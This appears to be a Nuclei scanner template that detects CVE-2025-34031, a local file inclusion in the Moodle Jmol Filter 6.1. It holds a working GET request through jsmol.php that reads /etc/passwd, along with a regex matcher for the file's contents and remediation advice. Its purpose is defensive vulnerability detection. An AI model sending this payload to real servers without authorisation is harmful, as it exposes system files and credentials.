id: CVE-2025-34031 info: name: Moodle Jmol Filter 6.1 - Local File Inclusion author: madrobot severity: high description: | Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server. impact: | Attackers can read arbitrary files from the server through the jsmol.php endpoint, potentially exposing sensitive configuration files and credentials. remediation: | Upgrade Moodle Jmol Filter to a patched version or remove the vulnerable plugin if not required. reference: - https://www.exploit-db.com/exploits/46881 - https://nvd.nist.gov/vuln/detail/CVE-2025-34031 classification: epss-score: 0.02963 epss-percentile: 0.85813 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N cve-id: CVE-2025-34031 cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: cve,cve2025,moodle,lfi,edb,jsmol,vkev,vuln http: - method: GET path: - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: content_type words: - "text/plain" - type: status status: - 200 # digest: 4a0a00473045022100e15b4a81954e49dd894cac15cffc67fd9168389d01cee10f6a49fdf590d0dd2702205aa2bcf9531e0f72a3fb125218a0da4b78ff371b2b566d0ab409165ecb452fd0:922c64590222798bb761d5b6d8e72950